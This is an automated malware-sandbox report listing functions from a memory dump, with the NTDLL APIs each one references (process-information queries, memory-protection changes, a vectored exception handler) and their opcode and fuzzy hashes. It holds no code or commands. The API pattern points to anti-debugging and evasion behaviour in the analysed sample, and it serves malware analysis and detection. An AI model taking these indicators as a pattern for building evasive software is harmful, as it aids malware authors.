                                        • Opcode ID: fdd736246f2f40920280cf481e6767f91d4e0f1b2c90498ce7a7099ff78cdd6d
                                        • Instruction ID: e09d277000f68cd3c9e0e62cc5d8b59fca2d88d5073f8fc53cf1d4478bd709cb
                                        • Opcode Fuzzy Hash: fdd736246f2f40920280cf481e6767f91d4e0f1b2c90498ce7a7099ff78cdd6d
                                        • Instruction Fuzzy Hash: 6E41D630608645DEEF3549A489583B8AEDDBB52354FA94E6FCD538B094D33588C1D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569804, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 139nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: b3452838dac1b121a15d58f5cec17da903bc477e1395e228a92db6b232c8755b
                                        • Instruction ID: 8b22f8138ac6867c7975e1b7c476eaa6559fdc2d50190d602fb92fc5e5963bc1
                                        • Opcode Fuzzy Hash: b3452838dac1b121a15d58f5cec17da903bc477e1395e228a92db6b232c8755b
                                        • Instruction Fuzzy Hash: 3441F730608645DEEF3549A489683B8AEEDBF52354FB94EAFCD538B094D33588C1DB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056982F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 139nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 6fea66c294dd9f5033a092a39c851a1d2a4185d01ec6962e0bd51e35db624985
                                        • Instruction ID: cb83814c4827c1ae9d7d812da0b1191b5009e64ea7be9471213bb39392cacb0b
                                        • Opcode Fuzzy Hash: 6fea66c294dd9f5033a092a39c851a1d2a4185d01ec6962e0bd51e35db624985
                                        • Instruction Fuzzy Hash: 1E41D630608745DEEF3589A489583B8AEEDBF52354FA90EAFCD538B190D33588C2D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056989B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: E
                                        • API String ID: 0-3568589458
                                        • Opcode ID: 01da7c2fecad67dac2d507c4c068e4a5da6bd69dda53c307ea1f33df40cd6444
                                        • Instruction ID: aa38fa98ed485faae1ea296536043af456de8038ddf08c7c7c2c2630278130d9
                                        • Opcode Fuzzy Hash: 01da7c2fecad67dac2d507c4c068e4a5da6bd69dda53c307ea1f33df40cd6444
                                        • Instruction Fuzzy Hash: 9E41C630508645DEEF3589A489583B8AEEDBF52354FB94E9FCD538B190D33588C2DB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005699D3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: ae3eb2a8f6c1a77f5d57d87f5366c01be1502cea853ece212c290171674c0a02
                                        • Instruction ID: a4e734b654954074378fd8d410274330b63656d1063292c4694e5f9bdceaf470
                                        • Opcode Fuzzy Hash: ae3eb2a8f6c1a77f5d57d87f5366c01be1502cea853ece212c290171674c0a02
                                        • Instruction Fuzzy Hash: 53418860508BC49FEF618674891876CAFAC7B13358FFC0ADEC9964B092D73988C6D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005698D4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 2728d3db86af8aea8d3cbc192d4bd10d63b1e08fc110eb7d255adf268ae5d1ba
                                        • Instruction ID: 42d1a3a3408aca59ac1f304f1a084e76fca9a8ca5273f74c03c3c35c07a0af95
                                        • Opcode Fuzzy Hash: 2728d3db86af8aea8d3cbc192d4bd10d63b1e08fc110eb7d255adf268ae5d1ba
                                        • Instruction Fuzzy Hash: D241A530508785DEEF358AA489583B8AEECBF52354FA94E9FCD528B190D33588C1D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056990D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: bb9f5999900be552586e8a5da7dde834c562d40f3e008069b03fce8bb4054c93
                                        • Instruction ID: 55f15e70890af580db836b959fe4ad9291ce8c43c98af2fb3e5eb60c31a3e8ab
                                        • Opcode Fuzzy Hash: bb9f5999900be552586e8a5da7dde834c562d40f3e008069b03fce8bb4054c93
                                        • Instruction Fuzzy Hash: DD41A530508745DEEF358AA489183B8AEEDBF52354FA94E9FCD528B1A4D33588C2D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569941, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: cfdd43ec6e4810539f245fee6f8458964ae904679bdaeeeaa4a48132c65c6be3
                                        • Instruction ID: 6754797fc32f8e662ad6d0603337eb44ffc48de1063b46c12ce63ff4fe47f11a
                                        • Opcode Fuzzy Hash: cfdd43ec6e4810539f245fee6f8458964ae904679bdaeeeaa4a48132c65c6be3
                                        • Instruction Fuzzy Hash: 9641C730508685DEEF354AA489183B8BEECBF52354FA94E9FCD538B0A4D33588C2D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056996B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 0a63ff97c401f274bb1be791b8f49d98a42d9eab5f444f58a3d5f4b1dd59fb2e
                                        • Instruction ID: 1568d2ab1669799f58e25bf76cc744ad3381c37acaee011a1b6d27edf39b4daa
                                        • Opcode Fuzzy Hash: 0a63ff97c401f274bb1be791b8f49d98a42d9eab5f444f58a3d5f4b1dd59fb2e
                                        • Instruction Fuzzy Hash: 5631C930508645DEEF3549A488183B8BEADBB12354FA94A9FCC528B0A4C33588C2D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569998, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 434b21120683e71d06a69b89d10295e0fcae5ecdd55a7860f41c41c361992b13
                                        • Instruction ID: 5dd91d0fea081bd22cc96a6c57775706d803b0592d8d349e491214a54728b068
                                        • Opcode Fuzzy Hash: 434b21120683e71d06a69b89d10295e0fcae5ecdd55a7860f41c41c361992b13
                                        • Instruction Fuzzy Hash: 3E31A830508785DEEF358AA489183B8AFEC7B12354FA94A9FCD924B0A0D73588C2D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569A7A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 1207091f89bf562ea6c411c1d770174f5339d3aeefc42f57bcb79cc1658af7ec
                                        • Instruction ID: 46fa3227d817c8dc23a658a92a738cb977e4e8035b1412bad5d5ba99f9570f87
                                        • Opcode Fuzzy Hash: 1207091f89bf562ea6c411c1d770174f5339d3aeefc42f57bcb79cc1658af7ec
                                        • Instruction Fuzzy Hash: 1031A930508645DEEF364AA489187B4BEAD7B12354FA94B9FCC524B0E5D33588C2D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569B4B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: e50233c07e138fa21c9f7d71922604d4948c1e4678bae438becfb43c28c5d2c6
                                        • Instruction ID: 4903911ba2cd0d0e62d4df8035e19da3059e110d6a7c2b8dc1dc12e6bd6b679b
                                        • Opcode Fuzzy Hash: e50233c07e138fa21c9f7d71922604d4948c1e4678bae438becfb43c28c5d2c6
                                        • Instruction Fuzzy Hash: 4E317620509B859FEF328A748918768BFAC7B13354FAD4ADFC9964B095C73588C6C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569AB1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 8ef3abc678b46a9a54b1ed37f94681c90b834e8d1c9a12c77e8e44fb892d63cf
                                        • Instruction ID: 79bbf13a3a76c65e7efb53389d0be26c9cd407338f9d4f0a7a8ae321ab7cf1a3
                                        • Opcode Fuzzy Hash: 8ef3abc678b46a9a54b1ed37f94681c90b834e8d1c9a12c77e8e44fb892d63cf
                                        • Instruction Fuzzy Hash: 0131B630508645DEEF358AA489187B4BFAC7F12364FA94A9FCC528B0A4C37588C6D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569B0D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 4efe71d0d312d789ce34548207e0e8223203965685525ccc1f1a3415ae0bb4d8
                                        • Instruction ID: cc971b3d1f2a93dd98d4b3f6e938524a8a2c3a16bb1c629d1c0a1bcaf4612d4f
                                        • Opcode Fuzzy Hash: 4efe71d0d312d789ce34548207e0e8223203965685525ccc1f1a3415ae0bb4d8
                                        • Instruction Fuzzy Hash: B3218730508785DEEF358AA485187B8BFAC7B12354FAD4ADFC9568B0A5C33588C5D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569AE5, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: ef59ee643b8e82df1698a5f7cce60ef1581c9633e52ce40114961da286d2ce5f
                                        • Instruction ID: b34a6216916901181ea585a99703a440a06a6c005d7d779c6a6de3b1e56c97da
                                        • Opcode Fuzzy Hash: ef59ee643b8e82df1698a5f7cce60ef1581c9633e52ce40114961da286d2ce5f
                                        • Instruction Fuzzy Hash: A4218630508685DEEF358AA489187B4BFAD7B12364FA94B9BCD52870A5C33588C6D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569C2E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 0ba2aa8f3ea157cf46380d4130e18e780c08697135957e1bc781411c107e8de1
                                        • Instruction ID: 1f5e518de2ae03b74667555c0ef9e875db51f7ef48ef01fec9be1a01f684bcaa
                                        • Opcode Fuzzy Hash: 0ba2aa8f3ea157cf46380d4130e18e780c08697135957e1bc781411c107e8de1
                                        • Instruction Fuzzy Hash: FD21B9609197C59FFF32867449183A8AF6C6F13354FAD09DFC9928B096D3394886C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00563288, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 005632C6: RtlAddVectoredExceptionHandler.NTDLL(?,Function_0000151B), ref: 00563317
                                          • Part of subcall function 005632C6: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,?,00000000), ref: 005633D8
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual$ExceptionHandlerVectored
                                        • String ID: E
                                        • API String ID: 4193742754-3568589458
                                        • Opcode ID: 8683bb82e3fa72a0c157e18bb862e2a4a751d1651adabe69f59092ba73eaeea5
                                        • Instruction ID: c126205cd47349c76e1366ace05909557ab49940f6b15e2e5873458578fb7d38
                                        • Opcode Fuzzy Hash: 8683bb82e3fa72a0c157e18bb862e2a4a751d1651adabe69f59092ba73eaeea5
                                        • Instruction Fuzzy Hash: 6E217FB4A047816FEB209A50C99879D3FA4BB13374FBC02A9EA525B0E2C755C881CF12
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569BB3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 177bb02e43fafa703f243fc715fb66b925acba56eb7ee4adbaf20db3b6593319
                                        • Instruction ID: 2746564c7f032e211c744b47111639571a8c9323411e806d9e293699d30bcc57
                                        • Opcode Fuzzy Hash: 177bb02e43fafa703f243fc715fb66b925acba56eb7ee4adbaf20db3b6593319
                                        • Instruction Fuzzy Hash: 70217730504785DEEF328A7485187A8AFAD7B13354FAD4ADFC9928B095C3358CC6D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569BEE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: e601f4f2bfa482d8fa8d0c9039252517bd818c665d91766a17d4280a93294320
                                        • Instruction ID: a66421ce507a32f9cb69651947e218cc5c1f038831415280720e82fc606059cf
                                        • Opcode Fuzzy Hash: e601f4f2bfa482d8fa8d0c9039252517bd818c665d91766a17d4280a93294320
                                        • Instruction Fuzzy Hash: 0621A530904745DEEF328AA485187B4AEAD7B12364FAD4ADFCC528B0A5C3358CC6D642
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056456E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID: E
                                        • API String ID: 2706961497-3568589458
                                        • Opcode ID: af94bd5134e5f702e60bf29a93d9ad45c8b4ed9fa657d9e2439ff37c3af48f41
                                        • Instruction ID: f2238d72ccd0e9be6f700ff5b7d37b43790258bb91db2b3aa14a72b36a80a31f
                                        • Opcode Fuzzy Hash: af94bd5134e5f702e60bf29a93d9ad45c8b4ed9fa657d9e2439ff37c3af48f41
                                        • Instruction Fuzzy Hash: 5011AFB09047826FF7219A64CD5979D6E68AB03378FBC03DEE9A29B0D3D756C441CB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569D09, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 6cd2316b7517eab2a6b8bd77f1dbc14ef5157cabf40752baf895a33d3d9ed0ba
                                        • Instruction ID: 76ae8e8c2db2fd379a05f8ae7d60607153903365cb4337a3d5a91444c1c10662
                                        • Opcode Fuzzy Hash: 6cd2316b7517eab2a6b8bd77f1dbc14ef5157cabf40752baf895a33d3d9ed0ba
                                        • Instruction Fuzzy Hash: DD219340509FC45BEB62D674491839CAF7C2B13388FEC0ADECAE64B196D72A4D86C746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569C99, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 42dce11020ef1e7cb29ff97f4785c0fe1e644c2329c644a80f14cf627b46ba4d
                                        • Instruction ID: ce01bae89c24a8ef80e5bf9d2f174fe3fe1dc75669e320ab546c7ac0d60ead06
                                        • Opcode Fuzzy Hash: 42dce11020ef1e7cb29ff97f4785c0fe1e644c2329c644a80f14cf627b46ba4d
                                        • Instruction Fuzzy Hash: 6F11B260508BC59AEF2299A448183A8AE6D6F13344FEC4ADFC9928B055C33A4886D746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005632E9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,?,00000000), ref: 005633D8
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID: E
                                        • API String ID: 2706961497-3568589458
                                        • Opcode ID: 1fda2dbcd99f1bf1004aa1f94e97b6ec879d4d1b2d4abdeb0a8243ba17bb5df8
                                        • Instruction ID: 468b58bce2138c3e847ef3016f86d9341678112bb22f049672947e98a23ee116
                                        • Opcode Fuzzy Hash: 1fda2dbcd99f1bf1004aa1f94e97b6ec879d4d1b2d4abdeb0a8243ba17bb5df8
                                        • Instruction Fuzzy Hash: D411D0B8600BC16FE741DF30C858789BFA4BF02398FA8419DDAD40B1A2C7788984CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569CDC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 12f503976d4ead822325a8842c14e2a3b1ef121e906371fdae30ca813fade709
                                        • Instruction ID: 88800080c77c761a677dd1aef19a2100a197294428584624f4eb36c51f296a1e
                                        • Opcode Fuzzy Hash: 12f503976d4ead822325a8842c14e2a3b1ef121e906371fdae30ca813fade709
                                        • Instruction Fuzzy Hash: 7601B524508BC59AEF36D5B849183B8AE6D6B13744BFC0EDFC9928B158D33608C3D746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569D74, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 7ab98fbd82f439e346a34d1161e0147a9f34663410d3e7d60677ad36a66870a4
                                        • Instruction ID: 5dcebff779481cc53fce9cb1876006b978408359c1ab8639687a539944426d3d
                                        • Opcode Fuzzy Hash: 7ab98fbd82f439e346a34d1161e0147a9f34663410d3e7d60677ad36a66870a4
                                        • Instruction Fuzzy Hash: C001A7505087C59FEB63D67489183A8AE6C6F13744BAC09DFCD918B065D73A4C86C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569DB7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 878ba306fcb1d261e3605e03dc00f84e16bab15941899e82391089d0b8d99e40
                                        • Instruction ID: a40ba278dbc20764ecc16e4e0b255dcf1224bbf0faff41605c9dfc4d6d4a7698
                                        • Opcode Fuzzy Hash: 878ba306fcb1d261e3605e03dc00f84e16bab15941899e82391089d0b8d99e40
                                        • Instruction Fuzzy Hash: DDF0AF10508BC59BEB62D57489183ACAE2D6F13788FEC0ADECAA64B445D73B4C87C746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00563349, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,?,00000000), ref: 005633D8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID: E
                                        • API String ID: 2706961497-3568589458
                                        • Opcode ID: b5c2b61e726674e4ecfdd699f6fd0a2f33de674a7f6cb3b8746fb3d677d1f26b
                                        • Instruction ID: ec199bfe5b1a1d7474389d2afaf3b5e1ecefda26c4c7bd31afa7727c35682fed
                                        • Opcode Fuzzy Hash: b5c2b61e726674e4ecfdd699f6fd0a2f33de674a7f6cb3b8746fb3d677d1f26b
                                        • Instruction Fuzzy Hash: 880184B0904BC15FF751DE348C0C78D7FA8AB163A9FA8029DD5E44B0E2C7B88984CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00564441, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 005644CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID: E
                                        • API String ID: 2706961497-3568589458
                                        • Opcode ID: 411ef2ae3a70413038cd20b15a917de3c8f778f68470dabc60547c0aafc90d5f
                                        • Instruction ID: 2201da2bce636378ff42dc0e118dee3042bcc61c6677265c6f4c12a497e1bbbe
                                        • Opcode Fuzzy Hash: 411ef2ae3a70413038cd20b15a917de3c8f778f68470dabc60547c0aafc90d5f
                                        • Instruction Fuzzy Hash: 7D0184B5405BC46FFB518E648C1C74CBEA45F123D9FB805DCDA914B092D7698985CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569DEB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID: E
                                        • API String ID: 1778838933-3568589458
                                        • Opcode ID: 93ff1817e9bc29342255bdb093a93bd2bfa95910f0b94a5b4d03b935b29ff32a
                                        • Instruction ID: 4b8984443a3d558725992f1377b46196431ceb7f3c606f7501d08947508d2c42
                                        • Opcode Fuzzy Hash: 93ff1817e9bc29342255bdb093a93bd2bfa95910f0b94a5b4d03b935b29ff32a
                                        • Instruction Fuzzy Hash: 2BF0C210408BC55BEB22D674491835C7E6C2B03348BBC0ADFCAA28B486D72B4886C746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00564490, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 005644CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID: E
                                        • API String ID: 2706961497-3568589458
                                        • Opcode ID: aad8b04cd649f91188b1a60c8d9ef4d4f09c517041877afe1e096271ccb7397b
                                        • Instruction ID: b7279aa9b8ec1518893e7f72e5c30ebd8c428fd86e53fd056bdda957894e10b7
                                        • Opcode Fuzzy Hash: aad8b04cd649f91188b1a60c8d9ef4d4f09c517041877afe1e096271ccb7397b
                                        • Instruction Fuzzy Hash: 0EF030A5509BC41BE752DA70492C34CBFA41F03389FAC05DDCAD50F192D7698985CB46
